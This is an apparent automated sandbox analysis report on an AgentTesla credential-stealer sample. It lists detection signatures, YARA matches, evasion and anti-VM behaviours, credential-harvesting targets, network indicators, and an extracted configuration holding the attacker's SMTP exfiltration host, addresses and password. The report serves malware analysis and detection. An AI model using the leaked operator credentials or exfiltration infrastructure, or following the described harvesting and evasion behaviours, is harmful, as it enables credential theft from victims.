Play interactive tour

Edit tour

Analysis Report mcsrXx9lfD.exe

Overview

General Information

Sample Name:	mcsrXx9lfD.exe
Analysis ID:	321297
MD5:	3d549885e44863c57f59eab47f2271cc
SHA1:	76c51be921ef41ff2596f3f882b91c8ede3713c7
SHA256:	1d9c8ee9be6e0ee20b600c71989292aa2efd0849611389e3121bae364d9d6adf
Tags:	AgentTeslaexe
Most interesting Screenshot:

Detection

AgentTesla

Score:	100
Range:	0 - 100
Whitelisted:	false
Confidence:	100%

Signatures

Detected unpacking (changes PE section rights)

Detected unpacking (overwrites its own PE header)

Found malware configuration

Multi AV Scanner detection for submitted file

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Yara detected AgentTesla

Contains functionality to detect sleep reduction / modifications

Machine Learning detection for sample

Maps a DLL or memory area into another process

May check the online IP address of the machine

Queries sensitive BIOS Information (via WMI, Win32_Bios & Win32_BaseBoard, often done to detect virtual machines)

Queries sensitive network adapter information (via WMI, Win32_NetworkAdapter, often done to detect virtual machines)

Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)

Tries to harvest and steal browser information (history, passwords, etc)

Tries to harvest and steal ftp login credentials

Tries to steal Mail credentials (via file access)

Antivirus or Machine Learning detection for unpacked file

Checks if the current process is being debugged

Contains functionality for read data from the clipboard

Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)

Contains functionality to call native functions

Contains functionality to check if a debugger is running (IsDebuggerPresent)

Contains functionality to check if a window is minimized (may be used to check if an application is visible)

Contains functionality to detect sandboxes (mouse cursor move detection)

Contains functionality to dynamically determine API calls

Contains functionality to query locales information (e.g. system language)

Contains functionality to read the PEB

Contains functionality to read the clipboard data

Contains functionality to retrieve information about pressed keystrokes

Contains long sleeps (>= 3 min)

Creates a DirectInput object (often for capturing keystrokes)

Creates a process in suspended mode (likely to inject code)

Creates a window with clipboard capturing capabilities

Detected TCP or UDP traffic on non-standard ports

Detected potential crypto function

Enables debug privileges

Extensive use of GetProcAddress (often used to hide API calls)

Found a high number of Window / User specific system calls (may be a loop to detect user behavior)

Found potential string decryption / allocating functions

IP address seen in connection with other malware

JA3 SSL client fingerprint seen in connection with other malware

May check if the current machine is a sandbox (GetTickCount - Sleep)

May sleep (evasive loops) to hinder dynamic analysis

Monitors certain registry keys / values for changes (often done to protect autostart functionality)

Queries sensitive processor information (via WMI, Win32_Processor, often done to detect virtual machines)

Queries the volume information (name, serial number etc) of a device

Sample execution stops while process was sleeping (likely an evasion)

Sample file is different than original file name gathered from version info

Tries to load missing DLLs

Uses SMTP (mail sending)

Uses code obfuscation techniques (call, push, ret)

Uses the system / local time for branch decision (may execute only at specific dates)

Yara detected Credential Stealer

Classification

Startup

System is w10x64

mcsrXx9lfD.exe (PID: 7076 cmdline: 'C:\Users\user\Desktop\mcsrXx9lfD.exe' MD5: 3D549885E44863C57F59EAB47F2271CC)

mcsrXx9lfD.exe (PID: 7100 cmdline: 'C:\Users\user\Desktop\mcsrXx9lfD.exe' MD5: 3D549885E44863C57F59EAB47F2271CC)

cleanup

Malware Configuration

Threatname: Agenttesla

{"Username: ": "In9AcPpFuU", "URL: ": "http://Gwd19zMdFbudWhUhS.net", "To: ": "sales1@tzdieep.net", "ByHost: ": "smtp.tzdieep.net:587", "Password: ": "Ttlj1OTOO1N4A", "From: ": "sales1@tzdieep.net"}

Yara Overview

Memory Dumps

Source	Rule	Description	Author
00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.680869571.0000000002632000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000001.679937947.000000000044B000.00000040.00020000.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.946830924.0000000000792000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000000.00000002.680813500.00000000025E0000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.947178259.0000000000B22000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.946449899.000000000044B000.00000040.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.946663757.0000000000630000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.948044914.00000000029B5000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mcsrXx9lfD.exe PID: 7076	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mcsrXx9lfD.exe PID: 7100	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Process Memory Space: mcsrXx9lfD.exe PID: 7100	JoeSecurity_CredentialStealer	Yara detected Credential Stealer	Joe Security
Click to see the 11 entries

Unpacked PEs

Source	Rule	Description	Author
1.2.mcsrXx9lfD.exe.b20000.4.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.mcsrXx9lfD.exe.630000.1.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.mcsrXx9lfD.exe.630000.1.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.mcsrXx9lfD.exe.25e0000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.mcsrXx9lfD.exe.25e0000.2.raw.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.1.mcsrXx9lfD.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
0.2.mcsrXx9lfD.exe.2630000.3.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.mcsrXx9lfD.exe.790000.2.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
1.2.mcsrXx9lfD.exe.400000.0.unpack	JoeSecurity_AgentTesla_1	Yara detected AgentTesla	Joe Security
Click to see the 4 entries

Sigma Overview

No Sigma rule has matched

Signature Overview

Click to jump to signature section

Show All Signature Results

AV Detection:

Found malware configuration

Show sources

Source: mcsrXx9lfD.exe.7100.1.memstr

Malware Configuration Extractor: Agenttesla {"Username: ": "In9AcPpFuU", "URL: ": "http://Gwd19zMdFbudWhUhS.net", "To: ": "sales1@tzdieep.net", "ByHost: ": "smtp.tzdieep.net:587", "Password: ": "Ttlj1OTOO1N4A", "From: ": "sales1@tzdieep.net"}

Multi AV Scanner detection for submitted file

Show sources

Source: mcsrXx9lfD.exe	Virustotal: Detection: 61%			Perma Link
Source: mcsrXx9lfD.exe	ReversingLabs: Detection: 79%

Machine Learning detection for sample

Show sources

Source: mcsrXx9lfD.exe

Joe Sandbox ML: detected

Source: 1.1.mcsrXx9lfD.exe.400000.0.unpack	Avira: Label: TR/Spy.Gen8
Source: 1.2.mcsrXx9lfD.exe.b20000.4.unpack	Avira: Label: TR/Spy.Gen8

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00408938 FindFirstFileA,GetLastError,		0_2_00408938
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00405AC0 GetModuleHandleA,GetProcAddress,lstrcpyn,lstrcpyn,lstrcpyn,FindFirstFileA,FindClose,lstrlen,lstrcpyn,lstrlen,lstrcpyn,		0_2_00405AC0

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)

Show sources

Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49766 -> 208.91.199.225:587
Source: Traffic	Snort IDS: 2030171 ET TROJAN AgentTesla Exfil Via SMTP 192.168.2.4:49767 -> 208.91.199.225:587

May check the online IP address of the machine

Show sources

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: global traffic

TCP traffic: 192.168.2.4:49766 -> 208.91.199.225:587

Source: Joe Sandbox View	IP Address: 54.235.83.248 54.235.83.248
Source: Joe Sandbox View	IP Address: 54.235.83.248 54.235.83.248
Source: Joe Sandbox View	IP Address: 208.91.199.225 208.91.199.225

Source: Joe Sandbox View

JA3 fingerprint: 3b5074b1b5d032e5620f69f9f700ff0e

Source: global traffic

TCP traffic: 192.168.2.4:49766 -> 208.91.199.225:587

Source: unknown

DNS traffic detected: queries for: api.ipify.org

Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: http://127.0.0.1:HTTP/1.1
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: http://DynDns.comDynDNS
Source: mcsrXx9lfD.exe, 00000001.00000002.948044914.00000000029B5000.00000004.00000001.sdmp, mcsrXx9lfD.exe, 00000001.00000002.948310266.0000000002BC2000.00000004.00000001.sdmp	String found in binary or memory: http://Gwd19zMdFbudWhUhS.net
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: http://QBfyHm.com
Source: mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSACertificationAuthority.crl0q
Source: mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	String found in binary or memory: http://crl.comodoca.com/COMODORSADomainValidationSecureServerCA.crl0
Source: mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	String found in binary or memory: http://ocsp.comodoca.com0
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
Source: mcsrXx9lfD.exe, 00000001.00000002.948356194.0000000002C0D000.00000004.00000001.sdmp	String found in binary or memory: http://smtp.tzdieep.net
Source: mcsrXx9lfD.exe, 00000001.00000002.948356194.0000000002C0D000.00000004.00000001.sdmp	String found in binary or memory: http://us2.smtp.mailhostbox.com
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.org/
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: https://api.ipify.orgGETMozilla/5.0
Source: mcsrXx9lfD.exe, 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp, mcsrXx9lfD.exe, 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: https://api.telegram.org/bot%telegramapi%/sendDocumentdocument---------------------------x
Source: mcsrXx9lfD.exe, 00000001.00000003.902505301.00000000008EF000.00000004.00000001.sdmp	String found in binary or memory: https://secure.comodo.com/CPS0
Source: mcsrXx9lfD.exe	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip
Source: mcsrXx9lfD.exe, 00000001.00000002.947961808.0000000002961000.00000004.00000001.sdmp	String found in binary or memory: https://www.theonionrouter.com/dist.torproject.org/torbrowser/9.5.3/tor-win32-0.4.3.6.zip%tordir%%ha

Source: unknown	Network traffic detected: HTTP traffic on port 443 -> 49765
Source: unknown	Network traffic detected: HTTP traffic on port 49765 -> 443

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_0040703E OpenClipboard,

0_2_0040703E

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_0043258C GetClipboardData,GlobalFix,GlobalUnWire,

0_2_0043258C

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_0045BDA0 GetKeyboardState,SetKeyboardState,SendMessageA,SendMessageA,

0_2_0045BDA0

Source: mcsrXx9lfD.exe, 00000000.00000002.680509638.000000000083A000.00000004.00000020.sdmp

Binary or memory string: <HOOK MODULE="DDRAW.DLL" FUNCTION="DirectDrawCreateEx"/>

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Window created: window name: CLIPBRDWNDCLASS

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00457E74 NtdllDefWindowProc_A,	0_2_00457E74
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0042E8BC NtdllDefWindowProc_A,	0_2_0042E8BC
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0044CA64 GetSubMenu,SaveDC,RestoreDC,72E7B080,SaveDC,RestoreDC,NtdllDefWindowProc_A,	0_2_0044CA64
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0043CE20 NtdllDefWindowProc_A,GetCapture,	0_2_0043CE20
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00444159 NtCreateSection,	1_2_00444159

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00452548	0_2_00452548
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0044CA64	0_2_0044CA64
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00405808	1_2_00405808
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00402296	1_2_00402296
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0040BD3D	1_2_0040BD3D
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0043D976	1_2_0043D976
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0044313D	1_2_0044313D
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00788C78	1_2_00788C78
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0078CD70	1_2_0078CD70
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00785150	1_2_00785150
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00787508	1_2_00787508
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_007899B8	1_2_007899B8
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00785598	1_2_00785598
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0078F770	1_2_0078F770
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00780388	1_2_00780388
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_0078CD6C	1_2_0078CD6C
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_007855E0	1_2_007855E0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF40CE	1_2_00AF40CE
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF7A28	1_2_00AF7A28
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF2E78	1_2_00AF2E78
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF98A1	1_2_00AF98A1
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF09A0	1_2_00AF09A0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AF8170	1_2_00AF8170
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_00AFDFB8	1_2_00AFDFB8
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_04A646A0	1_2_04A646A0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_04A645B0	1_2_04A645B0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 1_2_04A6D301	1_2_04A6D301

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: String function: 00403980 appears 38 times
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: String function: 00404320 appears 79 times

Source: mcsrXx9lfD.exe, 00000000.00000002.680903753.000000000267B000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameZQtNfvtFGCsonuAQoHKxGPIofZqXzdgRHbUF.exe4 vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000000.00000002.680456134.00000000007B0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameuser32j% vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe	Binary or memory string: OriginalFilename vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.946404123.0000000000402000.00000040.00000001.sdmp	Binary or memory string: OriginalFilenameZQtNfvtFGCsonuAQoHKxGPIofZqXzdgRHbUF.exe4 vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.946352836.0000000000198000.00000004.00000001.sdmp	Binary or memory string: OriginalFilenameUNKNOWN_FILET vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.950384937.00000000056C0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenameKernelbase.dll.muij% vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.947135544.0000000000B00000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx.mui vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.947103907.0000000000AE0000.00000002.00000001.sdmp	Binary or memory string: OriginalFilenamewshom.ocx vs mcsrXx9lfD.exe
Source: mcsrXx9lfD.exe, 00000001.00000002.946942776.0000000000820000.00000004.00000020.sdmp	Binary or memory string: OriginalFilenameclr.dllT vs mcsrXx9lfD.exe

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Section loaded: mscorwks.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Section loaded: mscorsec.dll	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Section loaded: mscorjit.dll	Jump to behavior

Source: classification engine

Classification label: mal100.troj.spyw.evad.winEXE@3/1@4/2

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00420594 GetLastError,FormatMessageA,

0_2_00420594

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00408B02 GetDiskFreeSpaceA,

0_2_00408B02

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00416D64 FindResourceA,LoadResource,SizeofResource,LockResource,

0_2_00416D64

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

File created: C:\Users\user\AppData\Roaming\mmnabeka.1fc

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key opened: HKEY_CURRENT_USER\Software\Borland\Delphi\Locales

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Section loaded: C:\Windows\assembly\NativeImages_v4.0.30319_32\mscorlib\a152fe02a317a77aeee36903305e8ba6\mscorlib.ni.dll

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::CreateInstanceEnum - root\cimv2 : Win32_Processor
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	WMI Queries: IWbemServices::ExecQuery - root\cimv2 : SELECT * FROM Win32_Processor

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\Safer\CodeIdentifiers

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	File read: C:\Windows\System32\drivers\etc\hosts	Jump to behavior

Source: mcsrXx9lfD.exe	Virustotal: Detection: 61%
Source: mcsrXx9lfD.exe	ReversingLabs: Detection: 79%

Source: unknown	Process created: C:\Users\user\Desktop\mcsrXx9lfD.exe 'C:\Users\user\Desktop\mcsrXx9lfD.exe'
Source: unknown	Process created: C:\Users\user\Desktop\mcsrXx9lfD.exe 'C:\Users\user\Desktop\mcsrXx9lfD.exe'
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Process created: C:\Users\user\Desktop\mcsrXx9lfD.exe 'C:\Users\user\Desktop\mcsrXx9lfD.exe'	Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{172BDDF8-CEEA-11D1-8B05-00600806D9B6}\InProcServer32

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll

Jump to behavior

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\15.0\Outlook\Profiles\Outlook\9375CFF0413111d3B88A00104B2A6676

Jump to behavior

Data Obfuscation:

Detected unpacking (changes PE section rights)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Unpacked PE file: 1.2.mcsrXx9lfD.exe.400000.0.unpack CODE:ER;DATA:W;BSS:W;.idata:W;.tls:W;.rdata:R;.reloc:R;.rsrc:R; vs .text:ER;.rsrc:R;.reloc:R;

Detected unpacking (overwrites its own PE header)

Show sources

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Unpacked PE file: 1.2.mcsrXx9lfD.exe.400000.0.unpack

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Code function: 0_2_00443C20 SetErrorMode,GetModuleHandleA,GetProcAddress,LoadLibraryA,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,SetErrorMode,

0_2_00443C20

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00444250 push 004442DDh; ret	0_2_004442D5
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0040C020 push 0040C038h; ret	0_2_0040C030
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0040C03A push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0040C03C push 0040C0ABh; ret	0_2_0040C0A3
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00410150 push 004101B1h; ret	0_2_004101A9
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0040C11A push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0040C11C push 0040C148h; ret	0_2_0040C140
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C120 push 0046C153h; ret	0_2_0046C14B
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C1DC push 0046C208h; ret	0_2_0046C200
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0045A1D8 push ecx; mov dword ptr [esp], edx	0_2_0045A1DD
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004281DC push 00428208h; ret	0_2_00428200
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004441E8 push 0044424Eh; ret	0_2_00444246
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00428190 push 004281D1h; ret	0_2_004281C9
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004101B4 push 004103B5h; ret	0_2_004103AD
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00428214 push 0042824Ch; ret	0_2_00428244
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C22C push 0046C26Fh; ret	0_2_0046C267
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0041C234 push ecx; mov dword ptr [esp], edx	0_2_0041C239
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C2EC push 0046C318h; ret	0_2_0046C310
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C294 push 0046C2D7h; ret	0_2_0046C2CF
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00432364 push 004323BDh; ret	0_2_004323B5
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0046C324 push 0046C350h; ret	0_2_0046C348
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004263D8 push 004264A8h; ret	0_2_004264A0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004103B8 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00412470 push eax; retf 0041h	0_2_00412471
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0041A4C8 push ecx; mov dword ptr [esp], edx	0_2_0041A4CA
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004104D0 push 004104FCh; ret	0_2_004104F4
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0047055C push 00470588h; ret	0_2_00470580
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00406576 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00406578 push 004065C9h; ret	0_2_004065C1
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00428538 push 00428564h; ret	0_2_0042855C
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0042C5E4 push 0042C610h; ret	0_2_0042C608

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00457EFC PostMessageA,PostMessageA,SendMessageA,GetProcAddress,GetLastError,IsWindowEnabled,IsWindowVisible,GetFocus,SetFocus,SetFocus,IsIconic,GetFocus,SetFocus,	0_2_00457EFC
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0043E4F4 IsIconic,GetCapture,	0_2_0043E4F4
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004585F0 IsIconic,SetActiveWindow,IsWindowEnabled,SetWindowPos,NtdllDefWindowProc_A,	0_2_004585F0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_004586A0 IsIconic,SetActiveWindow,IsWindowEnabled,NtdllDefWindowProc_A,SetWindowPos,SetFocus,	0_2_004586A0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00426BA4 IsIconic,GetWindowPlacement,GetWindowRect,	0_2_00426BA4
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0043ED9C IsIconic,SetWindowPos,GetWindowPlacement,SetWindowPlacement,	0_2_0043ED9C
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_00454FF0 SendMessageA,ShowWindow,ShowWindow,CallWindowProcA,SendMessageA,ShowWindow,SetWindowPos,GetActiveWindow,IsIconic,SetWindowPos,SetActiveWindow,ShowWindow,	0_2_00454FF0
Source: C:\Users\user\Desktop\mcsrXx9lfD.exe	Code function: 0_2_0043F680 IsIconic,GetWindowPlacement,GetWindowRect,GetWindowLongA,GetWindowLongA,ScreenToClient,ScreenToClient,	0_2_0043F680

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

0_2_00443C20

Source: C:\Users\user\Desktop\mcsrXx9lfD.exe

Registry key monitored for changes: HKEY_CURRENT_USER_Classes

Jump to behavior

